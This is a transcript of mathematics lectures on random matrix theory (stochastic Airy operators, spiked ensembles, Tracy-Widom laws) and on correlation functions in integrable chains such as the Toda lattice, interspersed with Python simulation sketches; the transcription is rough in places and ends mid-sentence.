eigenvalues of the general beta-Laguerre ensemble and you form these kind of gross-looking scaling constants, then the theorem is that if I center and scale any k eigenvalues of beta-Laguerre in this way, they converge to the ordered eigenvalues of stochastic Airy.
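A small numerical illustration of the bidiagonalization statement above, in the one case where no general-beta machinery is needed: for beta equal to 1, the bidiagonal chi model should reproduce the singular values of an honest n by kappa Gaussian matrix. The degrees-of-freedom pattern below (chi_kappa, chi_{kappa-1}, ... on the diagonal and chi_{n-1}, ..., chi_1 on the off-diagonal) is what I believe the slide shows; treat it as an assumption of the sketch.

```python
import numpy as np

rng = np.random.default_rng(3)
n, kappa, reps = 30, 50, 4000       # small sizes, just to compare the two distributions

def top_sv_bidiagonal():
    """Largest singular value of the beta = 1 bidiagonal chi model (d.o.f. pattern assumed)."""
    B = np.zeros((n, n))
    B[np.arange(n), np.arange(n)] = np.sqrt(rng.chisquare(kappa - np.arange(n)))
    B[np.arange(1, n), np.arange(n - 1)] = np.sqrt(rng.chisquare(np.arange(n - 1, 0, -1)))
    return np.linalg.svd(B, compute_uv=False)[0]

def top_sv_gaussian():
    """Largest singular value of an n by kappa matrix of i.i.d. standard Gaussians."""
    return np.linalg.svd(rng.normal(size=(n, kappa)), compute_uv=False)[0]

a = np.array([top_sv_bidiagonal() for _ in range(reps)])
b = np.array([top_sv_gaussian() for _ in range(reps)])
print("bidiagonal chi model: mean %.3f  std %.3f" % (a.mean(), a.std()))
print("full Gaussian matrix: mean %.3f  std %.3f" % (b.mean(), b.std()))
# The two empirical distributions should agree (same mean, std, histogram), which is the
# content of the Householder bidiagonalization argument for beta = 1.
```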
And if there's anything nice about this, it's the following. The history of this problem is that somebody did it for the complex case and somebody did it for the real case; that somebody for the real case was Iain Johnstone, as I mentioned, and in his original proof he required that the aspect ratio, kappa over n (in his case kappa was an integer), be bounded above and below uniformly as n went to infinity. And then in statistics there are apparently cases where you really care about the aspect ratio either blowing up to infinity or going to zero; this comes up. So other people wrote other papers in the real case for these other regimes, right? And this theorem does it all in one swoop. Yeah. That's at the hard edge? I'm at the soft edge, the biggest eigenvalue; I will talk about the hard edge. Yeah, but yeah, at the smallest eigenvalue you can get Tracy-Widom or you can get Bessel, depending. And do you have an operator for that too? Yeah, yeah, we have an operator for Bessel; that'll be tomorrow. Okay, so they're fine, okay? But this isn't, I think, super exciting; it's just to show that you can work through the same kind of ideas. So here's an honest-to-God application, and it's tied to what are called these spiked distributions. Iain Johnstone, same character, asked the following question: what happens to Tracy-Widom for, quote-unquote, non-null Wishart ensembles? The null Wishart ensembles are really when you have M M-transpose with M all i.i.d. centered Gaussians, right? But for statistical problems they care about things like M Sigma M-transpose, where Sigma is called the population covariance, for a general Sigma, right? So if you really want to base hypothesis tests on the biggest eigenvalue, on Tracy-Widom, you'd be interested in what kind of Sigmas break Tracy-Widom, right? And he even asked: look, I'd be happy if you could do the following. Take Sigma to be, quote-unquote... this is where the spike comes from: I'll take Sigma, instead of being the identity, to have a few entries C1, C2, C3, three different constants, and all the rest ones, right? In what cases can you mess up Tracy-Widom by putting different constants there? Okay. And this is one of those situations where, I think, the answer is more fascinating than the question. So in 2005, Baik, Ben Arous, and Peche showed there's a phase transition in these problems, in the spiked ensembles. And here I'm just going to demonstrate what they did for r equals one, for one spike. So the Sigma here (where are you, Sigma?) is just a C and then a bunch of ones; you just take one entry and you screw it up, right? So what they showed is that there's a critical value of this C, call it c-critical. It depends on the aspect ratio, on the dimensions; you can compute it. But if C is below this critical value, nothing happens, in the sense that you still get Tracy-Widom. You know, it makes sense: you start off at one, you push it up a little, you expect there to be some room. And I'm using the same notation: the sigma and the n here are the ones I had on the previous slide. Same centering and scaling, same limit law.
If C is bigger than the critical value, you change the centering and scaling and you get a simple CLT. What happens there, the idea is: if you push that constant too big, the biggest eigenvalue actually jumps out of the spectrum and just wiggles as an independent Gaussian by itself. You have the density of states, and the biggest eigenvalue escapes and fluctuates in a very classical way, okay? And then there's actually a tuning around the critical value: you take C to be the critical value plus something going down like n to the minus one-third, and then you take the limit as n goes to infinity. With the same centering and scaling, you get a new family of distributions which depend on this extra parameter. And this new family of distributions looks like Tracy-Widom times something, and that something can also be written in terms of Painleve II; something you can express in terms of the Lax pair for Painleve II. And I just want to mention: here beta equals two is absolutely critical, this is a determinantal thing. Subsequent to this, Mo did work for beta equals one, and then there was a partial result for beta equals four, using the analysis of the Pfaffian processes, by Dong Wang. But the whole random operator point of view really makes kind of quick work of this. So the deal is you can still tridiagonalize, right? Again, just thinking of one spike, here's a cute little exercise; remember what you have now (do I have some chalk?). You think of M as being all i.i.d. Gaussian, and then you take a C and a bunch of ones, and M-transpose, right? Take this matrix and write it, this is silly, as square root of C and a bunch of ones times square root of C and a bunch of ones, right? You put this one with this guy and this one with that guy, and all you do is change one row, or column, of your M, depending on how you're looking at it. And then you just do the same procedure, you can still bidiagonalize, and you get the same sort of tridiagonal model. The only thing... So why is the transition at that particular C? Why is it at that C? I don't know; you do the work and you see. Why does anything happen? You sit down and you prove it. Well, I mean, that's an interesting thing, right? It's showing that at some level you don't see the signal through the noise. You can be looking at an ensemble where one of your vectors is actually not standard Gaussian, it's Gaussian with a shifted variance, and your biggest eigenvalue doesn't see it, right? So that actually has content for people that do PCA stuff on a daily basis. So yeah, I don't know either. Yes? So just to make sure I understood: you just wrote this down, and I guess the claim is that that is a parameterization of the spiked beta model. Sure, and so then what you do is you pair this guy with this M, this is a Gaussian matrix, and you bidiagonalize that. And when you do that, all that happens is that you change that same tridiagonal matrix model I showed you; nothing changes except you shift one entry. No, my question was before that: the statement is that that, with M i.i.d. random sandwiched around this quantity, exactly has eigenvalues distributed by the spiked law. Oh yeah, absolutely. Okay.
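To see the transition numerically before the operator picture is brought in, here is a rough simulation of a rank-one spiked sample covariance with real Gaussian data. The critical value 1 + sqrt(p/n) and the bulk edge (1 + sqrt(p/n))^2 used below are the values I recall from the Baik, Ben Arous, Peche picture; treat them, and the specific sizes, as assumptions of the sketch rather than statements from the lecture.

```python
import numpy as np

rng = np.random.default_rng(11)
p, n = 200, 1000                        # dimension p, sample size n (arbitrary choices)
gamma = p / n
c_crit = 1.0 + np.sqrt(gamma)           # believed critical spike size
bulk_edge = (1.0 + np.sqrt(gamma)) ** 2

def top_eig_spiked(c):
    """Largest eigenvalue of the sample covariance when Sigma = diag(c, 1, ..., 1)."""
    X = rng.normal(size=(p, n))
    X[0, :] *= np.sqrt(c)               # spike the first coordinate
    return np.linalg.eigvalsh(X @ X.T / n)[-1]

for c in [1.0, 0.8 * c_crit, c_crit, 1.5 * c_crit, 3.0 * c_crit]:
    lam = np.mean([top_eig_spiked(c) for _ in range(20)])
    print(f"spike c = {c:5.2f}   mean top eigenvalue = {lam:6.3f}   bulk edge = {bulk_edge:5.3f}")
# Below the critical value the top eigenvalue sticks to the bulk edge (Tracy-Widom regime);
# well above it, it detaches and sits at an outlier location with Gaussian fluctuations.
```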
So you go through this tridiagonalization stuff and you see you get the exact same tridiagonal matrix model, except you change one entry, and then you think: how can that do anything in the limit? And it does almost nothing in the limit. So this is a result of Bloemendal and Virag; Bloemendal was a student of Balint Virag. At criticality, and I'm using this notation: remember B was our bidiagonal matrix, and I'm calling it B_C where I shift that one entry. Then B_C times B_C-transpose, when I take C to be the critical value plus the shift, converges, in the now familiar operator sense, to stochastic Airy. The only difference is we change the Dirichlet boundary condition to a Robin boundary condition, which is where that extra parameter shows up, right? So in fact you have a whole general-beta spiked family of limiting eigenvalues: stochastic Airy with maybe a different boundary condition. For different betas and different w's there's a whole family of ground states, right? And by taking omega, or w, whatever you want to call it, to infinity, you recover the classical, quote-unquote, Tracy-Widom beta. Okay. So that's the theorem, and I won't show how that works. But let me, if you give me one more second, show what I think is the best payoff of this, which is the following. You can still play the Riccati game, all right? So a corollary of having this theorem: if I want to actually write down a formula for the distribution function, the way you do this in this context is you cook up this little diffusion and ask that it never explodes, never explodes to minus infinity. And you remember what you did there: you looked at a shooting eigenfunction. You look for a phi, or is that a psi, I don't know, depending on x, at a fixed lambda, satisfying your eigenvalue problem. For the Dirichlet case you want to start it off at zero and at one; for the Robin case you start it off with psi of zero equal to one and psi prime of zero equal to omega, right? That's the right shooting for the Robin case. And when you look at the Riccati, you don't start at infinity anymore; you start off at omega, at a finite place. And if you carry through what I did yesterday, the upshot is: the general Tracy-Widom beta law is the probability that this little diffusion, starting off at time lambda (lambda is the spectral parameter) at spatial point w, never explodes. So all the Tracy-Widom beta laws are tied to the same diffusion, just with different starting times and different starting places. And then here's just a fundamental fact: take any Markov process and ask for the probability that it never leaves its domain; that's a quote-unquote harmonic function for the process, which means that probability is killed by its generator. So what you're looking at here is the spatial process, and implicitly you're looking at time. So almost immediately it means that if you write this down (here I'm writing the distribution function for Tracy-Widom beta), it solves this PDE. This is just the PDE defined by the space-time generator; if I look at the diffusion p along with its time coordinate, that's automatic, it requires no work. And you can prove that this PDE has a unique bounded solution; the right boundary conditions are that you're looking for a distribution function in lambda.
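Before the PDE uniqueness point gets picked up again just below, here is a rough Monte Carlo sketch of the characterization just stated: Euler-Maruyama for the Riccati diffusion, started at "time" lambda from the value w (or from a large value as a stand-in for the Dirichlet case), counting paths that never dive off to minus infinity within a finite horizon. The drift convention dp = (t - p^2) dt + (2/sqrt(beta)) db, the finite horizon, the starting proxy, and the explosion threshold are my own choices and approximations, not the lecture's.

```python
import numpy as np

rng = np.random.default_rng(5)

def tw_beta_cdf(lam, beta, w=np.inf, horizon=12.0, dt=1e-3, reps=5000):
    """Monte Carlo estimate of P(TW_beta <= lam); w is the Robin parameter, w = inf
    standing in for the Dirichlet case. Estimated as the non-explosion probability of
    dp = (t - p^2) dt + (2/sqrt(beta)) db started at p(lam) = w. Horizon, step size,
    starting proxy and explosion cutoff are ad hoc numerical choices."""
    start = 10.0 if np.isinf(w) else w          # proxy for starting "at +infinity"
    p = np.full(reps, float(start))
    alive = np.ones(reps, dtype=bool)
    t = lam
    for _ in range(int(horizon / dt)):
        dB = rng.normal(0.0, np.sqrt(dt), reps)
        p[alive] += (t - p[alive] ** 2) * dt + (2.0 / np.sqrt(beta)) * dB[alive]
        alive &= p > -8.0                       # a dive below -8 is treated as an explosion
        t += dt
    return alive.mean()

for lam in [-4.0, -2.0, 0.0, 2.0]:
    print(f"lambda = {lam:5.1f}   estimated F_2(lambda) = {tw_beta_cdf(lam, beta=2.0):.3f}")
# For beta = 2 these should roughly track the classical GUE Tracy-Widom distribution
# function, up to Monte Carlo noise and the finite-horizon bias.
```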
And if you add that to the PDE, you can show it has a unique bounded solution, so that thing is the Tracy-Widom beta distribution function. There's much one could say about how you then get formulas for beta equals 1, 2, 4 and for different spiking levels and so on. But this PDE has actually been used as a starting point by Igor Rumanov to get the first Painleve-type formulas outside the classical betas: Igor has this work where he gets Painleve, again in terms of Painleve II, for beta equals six, and that's the first such beta for which there have been any exact formulas. I would argue that a probability is an exact enough formula, but if you like exact formulas, Igor has done that. I don't know the full story, though: Igor did something, and then I know Professor Its and Tamara cleaned some of his asymptotics up, or maybe he got something wrong; they can tell you more about it. But this PDE has actually been used to get Painleve formulas. That's the point. All right, I know, I'm over. All right. Thank you. Excuse me, did I understand correctly that it is possible to define all these, let's say, quadratic forms on the same probability space, so that the quadratic forms converge to the limit quadratic form, the eigenvalues are random variables on the same probability space, and there is convergence in terms of, so to speak, the operators themselves, understood through their Dirichlet forms? Exactly. That's really how the proof works. The proof really is an almost sure statement: we show that with probability one the first eigenvalue converges; we can do it again for the second eigenvalue; and so on, all almost surely. So if you have seventeen almost-sures, then you can back up and say jointly in distribution. Well, yeah: do it for the second eigenvalue, the third eigenvalue, up to the seventeenth eigenvalue, and every statement is with probability one, so then you have joint weak convergence, which is how we advertise it. Yes, Professor? I have a remark, about the very last explanation. Okay, yeah, yeah. So, to be more exact: of course, in Rumanov's paper you have to solve some auxiliary, complicated ODE. Okay. Or, equivalently, you can say that you can express the Tracy-Widom for beta equal to 6, even for beta equal to any even number, in terms of the solution of a Calogero-type system. This also was shown by Rumanov. But only recently, only about a year ago, it was finally shown that this Calogero-type system is integrable. It's integrable in the sense of... it is a work of Bertola, Rubtsov, and Cafasso. So in a sense what Rumanov did was a very important step, but, you know, we have a paper, with Cafasso and Mezzadri, where we explain this, and after that there was still a lot of work. But now it is in a very good setting. So now indeed, for all even beta, we can say that the Tracy-Widom is indeed represented by some integrable system. Okay, I see, I see. Okay, so let's thank Brian again and go for lunch. All right. Another narrow escape. Okay.
Random matrix theory is an asymptotic spectral theory. For a given ensemble of n by n matrices, one aims to prove limit theorems for the eigenvalues as the dimension tends to infinity. One of the more remarkable aspects of the subject is that it has introduced important new points of concentration in the space of distributions. Take for example the Tracy-Widom laws. First discovered as the fluctuation limit for the spectral radius of certain Gaussian Hermitian matrices, these laws are now understood to govern the behavior of a wide range of nonlinear phenomena in mathematical physics (exclusion processes, random growth models, etc.) My aim here will be to describe a relatively new approach to limit theorems for random matrices. Instead of focussing on some particular spectral statistic, one rather understands the large dimensional limit as a continuum limit, demonstrating that the matrices themselves converge to some random differential operators. This method is especially suited to the so-called beta ensembles, which generalize the classical Gaussian Unitary and Orthogonal Ensembles (GUE/GOE), and can be viewed in their own right as models of Coulomb gases. The first lecture will review the underlying analytic structure of the just mentioned classical ensembles (essential to, for example, Tracy and Widom’s original work), and then introduce the beta ensembles along with our main players: the stochastic Airy, Bessel, and Sine operators. These operators provide complete characterizations of the general edge and bulk statistics for the beta-ensembles and as such generalize all previously discovered limit theorems for say GUE/GOE. Lecture two will provide the rigorous framework for these operators, as well as an overview of the proofs of the implied operator convergence. The last lectures will be devoted to upshots and applications of these new characterizations of random matrix limits: tail estimates for general beta Tracy-Widom, a simple PDE description of the Baik-Ben Arous-Peche phase transition, approaches to universality, and so on.
10.5446/54168 (DOI)
OK. So, regarding the second topic, this is somewhat more experimental mathematics. Let me explain the setting. The setting is the following: we consider a one-dimensional system, a very simple problem. We take a system of 2n+1 particles (this is just for convenience), with a Hamiltonian where we have a nearest-neighbour interaction potential V and a single-site potential W. The equations of motion are Hamiltonian and are given by Hamilton's equations in the form above. We consider both Dirichlet and periodic boundary conditions. So this is the setting, and the equations are deterministic. In this setting there are a lot of examples you can take: the harmonic chain, FPU, the Toda lattice. The first and third cases are integrable; the one in the middle is clearly non-integrable. So this is a very clean setting: we have an ODE with a potential that can make the equations integrable or non-integrable. What I want to do next is to study these equations with random initial data. I take as initial measure the Gibbs measure of the system: we take the Hamiltonian, Z is the normalizing factor, and we have e to the minus beta H of q and p, where beta is the inverse temperature, against the volume element of the phase space. Since H is the Hamiltonian it is a conserved quantity, and since the Hamiltonian flow conserves phase-space volume, the measure at time t is equal to the measure at time zero, and this is exactly the Gibbs measure. So what else? The next step is to study two-point correlation functions. For example, for the positions, the two-point correlation function is an expectation. We center our chain of particles, which runs from 1 to 2n+1, so particle n+1 is at the center of the chain. And we want the expectation of the particle at the center at time zero times the particle at position alpha with respect to the center at time t, minus the average of these values. So this is the fluctuation, a space-time fluctuation. And you can define in a similar way position-momentum, momentum-momentum, momentum-position correlation functions, and so on. These are the quantities of interest. The goal is to understand the large-time behaviour of these correlation functions: the behaviour for long times, at low temperature, so beta sufficiently big (not too big, but sufficiently big), and as the number of particles becomes large. For this problem there is quite a big amount of literature, numerical literature; in the last ten years there has been a flourishing number of papers doing numerics. And the claim is the following.
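Before stating the claim, here is a concrete companion to the setup just described: a minimal symplectic (velocity-Verlet) integrator for a chain with nearest-neighbour potential V and on-site potential W, with periodic boundary conditions. The FPU-type quartic V, the absence of pinning, and the crude initial data are illustrative choices of mine; the momenta are an exact Gibbs draw, while sampling the positions faithfully from the Gibbs measure is a separate step only hinted at in the comment.

```python
import numpy as np

# Chain of N particles, H = sum p_j^2/2 + sum V(q_{j+1}-q_j) + sum W(q_j), periodic BC.
N, dt, nsteps, beta = 255, 0.02, 5000, 1.0

def V(r):
    return 0.5 * r**2 + 0.25 * r**4      # FPU-type quartic interaction (illustrative)

def dV(r):
    return r + r**3

def dW(q):
    return 0.0 * q                       # no on-site potential in this sketch

def force(q):
    r_right = np.roll(q, -1) - q         # q_{j+1} - q_j
    r_left = q - np.roll(q, 1)           # q_j - q_{j-1}
    return dV(r_right) - dV(r_left) - dW(q)

def energy(q, p):
    return 0.5 * np.sum(p**2) + np.sum(V(np.roll(q, -1) - q))

rng = np.random.default_rng(0)
p = rng.normal(0.0, 1.0 / np.sqrt(beta), N)  # momenta: exact Gibbs draw (i.i.d. Gaussians)
q = np.zeros(N)                              # positions: crude stand-in; a faithful Gibbs
                                             # sample would draw stretches from exp(-beta*V)/Z

E0 = energy(q, p)
for _ in range(nsteps):                      # velocity-Verlet (leapfrog) step
    p += 0.5 * dt * force(q)
    q += dt * p
    p += 0.5 * dt * force(q)

print("relative energy drift after %d steps: %.2e" % (nsteps, (energy(q, p) - E0) / E0))
```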
So this correlation quantity behaves in two fundamentally different ways according to whether the system is integrable or not integrable. It falls into two different classes. And this is a picture taken from this paper by Kundu and Dhar; it's a PRE from 2016. So what am I showing there? You have some peaks, and these are the correlations with respect, for example, to Q. So you have some peaks traveling. So the red peaks. Let me see if there is a pointer that works. OK, thank you very much. OK. So these wave peaks correspond to the same correlation function. They start in the middle and they move, one to the left and one to the right, and they are shown at different times, for example 500, 1000, 1500. So these are three peaks. And physicists are interested in the scaling of these peaks. The claim is that if you plot these peaks in the scaling regime (they travel with constant speed, they decrease in height as a function of t, and they get wider), so if you make a plot of these three peaks in this scaled plane, x plus c t divided by t on one axis and t times the correlation on the other (the exponent of t is one), then you see only one peak. The C in the paper is what I call S, one of the correlation functions; they call it C, I call it S. So they have this scaling, and this scaling is called ballistic scaling in the physical literature. OK, so this is the same stuff for FPU. The Toda lattice is an integrable system; FPU is not an integrable system, there you have the quartic oscillator. And so there is the same plot of the same object, and now you want to scale it again, and now the scaling is t to the two over three and two over three here. And they also have the shape of this scaling function, which is called f KPZ. So this falls in the KPZ universality class. So basically it looks like, whether you take a stochastic equation with given initial data or a deterministic equation with random initial data, when you are in the non-integrable case and you study fluctuations, you more or less fall in the same class. But this is only numerics. In this business there is only numerics. To prove this fact is, I think, completely out of reach at the moment; it's very complicated. So let me make some comments on the integrable case, and I'm starting with the basic integrable equation, which is the harmonic oscillator. So we start with the harmonic oscillator and we want to compute these quantities. This is an exercise which probably all of you will be able to do, but let's do it together. So we have zero boundary conditions, so I can write this quadratic Hamiltonian. So this is the harmonic oscillator, where we have this parameter mu, and the boundary values are both zero. So we can write the quadratic Hamiltonian in this form, where this matrix is responsible for the coupling of the nearest-neighbor interaction. And I want to solve the equations of motion. So if you diagonalize this matrix, you end up with a chain of uncoupled oscillators, which is given here.
So if I call the eigenvalues and eigenvectors of m lambda j and and the WBJ, and then I can make a change of variable between my q amp to q hat amp, which is basically Fourier transform, discrete Fourier transform. And my Hamiltonian becomes a couple. So the Hamiltonian becomes a sum of uncoupled harmonic oscillators, which I can solve as sine cosine. OK. And the frequency omega j is just the combination of square root of mu lambda j plus 2 mu, which was entering the equation is to quantity. OK, so far so good. So let's go home. So now we go to the Gibbs measure. So the Gibbs measure is this given by this quantity where this is the normalizing factor. So this change of variable is a canonical change of variable. And so the Gibbs measure become basically product of n Gaussian to n plus one Gaussian in this normal in this new variable dp hat j and dq hat j. And now I can calculate all these correlation functions. For example, if I want to consider the two point correlation function of momentum pp, so it's given by this expression. So p, so the expectation of the p is zero here, because this is Gaussian, even in the original variable. So the average value of the p at any, at both time t, at time zero is zero. And the pp correlation function is basically given by the expectation of this quantity pn plus one minus minus halve, which is hold this p here plus pn plus one zero, which is this p here. OK, and now so you see these are all Gaussian variables. So the only terms that contribute is the product of pj pk when p hat j p at k. So this is our calculating zero when they are the same. So you get these two points correlation function. So is the sum from one to two n plus one, one over beta, the cosine of omega j in times these two vectors that are the vectors that change coordinates. So let me stress that beta doesn't enter in the evolution at all. OK, so now I let me write a little bit rewrite this quantity to make some jina. So in the building the SPP is not from the point where the origin was, but it is a point minus one point correlation function. So is well is the correlation at the point times zero at the point n plus one time t at the point n plus one minus alpha. No, but you want to you remove the average. This is the definition. But then you're going to change the part of it. Your assumption is getting some one point correlation function. No, no, because this is this is here. This one is this piece here, the first piece here. And this pn01 is this piece here. So. And this is always zero because we are in a gaussian distribution. OK, so. So what else? So let me so we arrive to this formula and let me let me try to get to get some more to massage it a little bit more. So if you plug in the explicit value that you have vkj and lambda j whatever. So it ends up with this with this form. So. And now I want to sound from m from zero to n. So so is this so is the product of two cosine with this weight. So let me make a substitution. So now I'm a little bit pedestrian. So you put s here equal m over n. So here you have an m over n m over n one over n. So and delta s is one over n. So here I can become my my delta delta s. And here I can change this. I'm over n to an s. So this this s p p alpha t in the limit tangos to infinity become an integral. Which is given here plus some exponentially small errors. So is a very explicit formula that is obtaining a very straightforward weight. OK. And so you can prove this formula. The part to prove is there or is not the leading term. 
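As a sanity check on the explicit formula just obtained (before its proof is discussed), one can evaluate it by brute-force diagonalization of the tridiagonal coupling matrix. The dispersion relation written below and the parameter names nu, kappa are assumptions standing in for the lecture's constants; only the structure, a sum over modes of cos(omega_j t) times products of eigenvector entries, is the point.

```python
import numpy as np

# Momentum-momentum correlation for a harmonic chain with Dirichlet
# boundary conditions:
#   S_pp(alpha, t) = (1/beta) * sum_j cos(omega_j t) * v_j[c] * v_j[c + alpha],
# where (lambda_j, v_j) is the eigen-decomposition of the tridiagonal
# coupling matrix and omega_j = sqrt(nu + kappa*lambda_j)  (assumed form).

def harmonic_Spp(N=401, beta=1.0, kappa=1.0, nu=0.5, t=50.0):
    M = 2*np.eye(N) - np.eye(N, k=1) - np.eye(N, k=-1)   # discrete Laplacian, Dirichlet
    lam, V = np.linalg.eigh(M)                           # columns of V: orthonormal eigenvectors
    omega = np.sqrt(nu + kappa*lam)
    c = N // 2                                           # centre of the chain
    alphas = np.arange(-c, c + 1)
    weights = V[c, :] * np.cos(omega*t)                  # cos(omega_j t) * v_j[c]
    S = V[c + alphas, :] @ weights / beta                # sum over modes j, for every alpha
    return alphas, S

alphas, S = harmonic_Spp()
# plotting S against alphas shows the correlations spreading ballistically from the centre
```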
So the part to prove is there. And you can another exercise, which is also elementary. So this was obtained with the Rich Le boundary condition. If you move to periodic boundary condition, you get the same formula. So it doesn't matter the end points what you put. And so with the same with the same gymnastic, you can get the other coloration functions on the qq and the qp. So let me just make an observation. So if you put here the mu equal to zero, this object is basically basal function. So and so when you study t goes to infinity, you study the behavior of basal functions t goes to infinity. However, you cannot really put mu equal to zero, because if you put mu equal to zero here, this remaining piece is divergent. So it's going to infinity, both here and here. So this two mu minus two cos mu is divergent at zero. So you cannot. OK. So and another observation is that when you study, so I was telling you that this correlation function are studied in the limit of beta largest, so small temperature to limit. But for the harmonic oscillator, you see that I mean the large time behavior is quite independent from beta. So it should not depend from beta. OK. So the study of this quantity, so the large time behavior of this quantity in the afternoon can make laugh and win. We discuss how this object will behave for large time. OK. So now the goal is to. So this is was a linear integral system harmonic oscillator. So let me try to explain what happened with toda. So what can we say with toda? So I'm going to explain some basic integral system techniques. So regarding, so we are doing this, this business for integral system, and you can object to me that there are no many integral system. I mean, in respect to. So the number of integral system with respect to the number of non integral system is much more. But still, I mean, despite there are some finite number of point in the set of dynamical system, it's still interesting to look at what happens. OK. So the toda lattice is a model of interactive particle with nearest neighbor interaction, which was introduced in about 1967 by this physicist, Morikazu Stoner, which is a statistical mechanic guy. And so if you put a coefficient here alpha in front of this interaction and you make alpha small, you can. You can show that so this is a miltonian at leading order is converged to the Hamiltonian of anharmonic oscillator plus I. Over the correction. OK. So toda found out that several he found out several exact solution of this equation. And then people start to think that maybe the dynamical system is an integral dynamical system is a higher is definitely non linear and integral. And so integrability was discovered on the 70 but flash can manakov. And the idea is to perform a change of variables. So you introduce a new dependent variable a j and b j by this expression. And so with so with this definition, since we have periodic boundary conditions so the so we have that the product of the j is equal to one. And so the toda equation in this new variable so replaced by basically quadratic equation so two couple quadratic equation. So how to integrate them so I will revise very quickly the theory. So let me first show that if you introduce this matrix, which is called the lux matrix and another matrix, which I call a, which is the upper diagonal of l minus the lower diagonal of l. Then this quadratic equation of motion. So this equation here are equivalent to this commutate matrix commutator of a times cell. 
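A quick numerical check of the Lax (commutator) form just written down: in these variables the flow becomes the quadratic system quoted above, and the spectrum of the periodic tridiagonal matrix L does not move along the flow. The normalization a_j = (1/2) exp((q_j - q_{j+1})/2), b_j = -p_j/2 used below is one standard convention (Flaschka's) and may differ from the lecture's by signs and factors.

```python
import numpy as np

# Toda flow in Flaschka-type variables:
#   da_j/dt = a_j (b_{j+1} - b_j),   db_j/dt = 2 (a_j^2 - a_{j-1}^2)  (periodic indices).
# The eigenvalues of the periodic Lax matrix L (diagonal b, off-diagonal a,
# plus the two corner entries) should stay fixed up to the integrator error.

def lax_matrix(a, b):
    L = np.diag(b) + np.diag(a[:-1], 1) + np.diag(a[:-1], -1)
    L[0, -1] = L[-1, 0] = a[-1]            # periodic corner entries
    return L

def rhs(a, b):
    da = a * (np.roll(b, -1) - b)
    db = 2.0 * (a**2 - np.roll(a, 1)**2)
    return da, db

def rk4_step(a, b, dt):
    k1 = rhs(a, b)
    k2 = rhs(a + dt/2*k1[0], b + dt/2*k1[1])
    k3 = rhs(a + dt/2*k2[0], b + dt/2*k2[1])
    k4 = rhs(a + dt*k3[0],   b + dt*k3[1])
    a = a + dt/6*(k1[0] + 2*k2[0] + 2*k3[0] + k4[0])
    b = b + dt/6*(k1[1] + 2*k2[1] + 2*k3[1] + k4[1])
    return a, b

rng = np.random.default_rng(1)
N = 32
q, p = rng.normal(size=N), rng.normal(size=N)
a = 0.5*np.exp((q - np.roll(q, -1))/2)
b = -p/2
spec0 = np.sort(np.linalg.eigvalsh(lax_matrix(a, b)))
for _ in range(2000):
    a, b = rk4_step(a, b, 1e-3)
spec1 = np.sort(np.linalg.eigvalsh(lax_matrix(a, b)))
print(np.max(np.abs(spec1 - spec0)))       # tiny drift: the spectrum is conserved
```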
So the derivative of the l over dt here so you make derivative is equal to this matrix commutator. So what is the advantage of this formulation so the advantage is that since I is a commutator so it means that the eigenvalues of failure constant of motion. And at this point I want to say that the eigenvalues generic are not distinct. So we have so we have a system of two n particle and we found basically lambda one lambda m constant quantity, which they turn also to be independent. So it means more or less that the system is integrable. And let me show it how to integrate it. So so to integrate it we need some other eigenvalues, which are obtained from l by chopping out the first row and first column. So you chop out the first row and first column for him, and you get this m minus one matrix, which I call m. And this matrix so is three diagonal and symmetric and the upper and lower diagonal are positive because these are exponential of q. So they are positive. And so it means that the eigenvalue are all these things. So we have m minus one and give value and they are all these things. So Brian Reider mentioned that I mean so the spectral tier of the three diagonal matrix so let me a little bit go through it. So. So we have now two sets of n degree value so mu one q two mu m minus one and lambda one lambda two lambda n. And so the claim is that when we studied the theory of periodic Jacobi operators which correspond to hell. So it's possible to recover my my original variable a one a m b one b m from this data so lambda one lambda n mu one mu n. OK, so this is mu n mu one mu n are the eigenvalue of this matrix. The eigenvalue of l. Of the full. So we have two different matrix. And so one of these is is is straightforward. So since the trace of l is a constant motion, so we can say that b one is equal to the sum of from j to two to n of the b j plus the sum of the lambda j. So the trace are the same. So it means that the sum of the b j is equal to the sum of the lambda j. So I can write this equation and looking at them. So this is equal also to the minus the sum of the mu j. So b one is obtaining a simple way from the spectral data. And also there is also another trivial integral, which is n, which is the inverse of the product of the j from one to one. OK, so this is this is half of the way. I mean, I want to sorry, I'm a little bit to. There are these is so this is our. Yeah, there are some. So this is yes, this is come out. So the product of a j is equal to one, so you have one less. So the product of the a are equal to one. So on the on the sum of the b are equal to constant, which is the sum of the. Sorry. No, no, the formula for a j. I still have to give it. So now I want to. So this is basically now. I mean, I want to a little bit do some study some property. Spectral theory of this, this matrix, m to recover the b and a is from two to n and a is from two to minus one from the spectral data. So let me remind that so this is symmetric to diagonal matrix and can be orthogonal. So we're always on orthogonal matrix in lambda is the diagonal. And so if we take an eigenvektor v of m and we write this equation mv equals mu v for some you. So the component of this vector, so which should be a transport, yes, this should be a column vector. So vj is a polynomial in mu of degree j minus one. So if you write this equation, so is a trigonagonal matrix when you have orthogonal polynomial is the same structure. 
So it means that vj is equal to v1 times, which is always no zero time a polynomial so of degree j minus one, which I call in this way amp is zero is equal to one. So basically I can write basically my matrix so so if I introduce I define that the square of the first entries of the row of all I define it like wk. So the orthogonality relation give me that wk is equal to one and the matrix so can be written in this form. It's another way to write the matrix for so basically this is our the eigenvektor of all on the orthogonality relation on the row so this orthogonality relation time see this formula here so the sum from k for one to minus one of wk plk. Pl of evaluating mu k pj evaluating in uk is equal to delta lj. So this formula basically tells us that the pl are orthogonal polynomial normalize orthogonal polynomial with respect to the discrete weight wk at the point uk. So, and so the theory so tells us that if we know the w and the mu we are able to build the p. So the only data that we need knowing the spec the weights and the points this is a sufficient data to build the pl. uk. And so the data so will be basically so my my data will be basically the first row of the orthogonal matrix and the points mu k. Once I have this data I can recover the entries bk plus one. From the matrix mkk the diagonal and the ak plus one from the upper over the diagonal by this formula. So, I still need to so this is just there is no dynamic here so I'm just this is just a formula for the constructing from the orthogonal polynomial. So the inverse problem from the orthogonal polynomial the three diagonal matrices and the map is one to one. Now I want to say more about this, this w and the evolution of this m, this mu so the w and the mu are not constant in time but a function of time. So, and this is basically is coming a little bit out of the blue but so this time evolution is so was obtained in the 17 paper by Casper Merberke. And so you need to introduce two polynomials one is q and one is p q is just the monic polynomial which has root the lambda j the game value fell and peace the monic polynomial that has roots the game value of m and I call it mu j. And so the evolution of this of this mu so the mu evolves in time according to this rule so here be prime is the rivati with respect to to the argument so that when you evaluate this polynomial in you are you is not zero. So, it is not absolutely clear from from from this formula that this quantity on the square root is positive and real so make let me make a plot. So, the plot is the following how it looks the q so you need to know more a little bit so the q. So, the q looks in the following way. So, this is q of lambda. So, lambda this is zero and this is minus four. And for 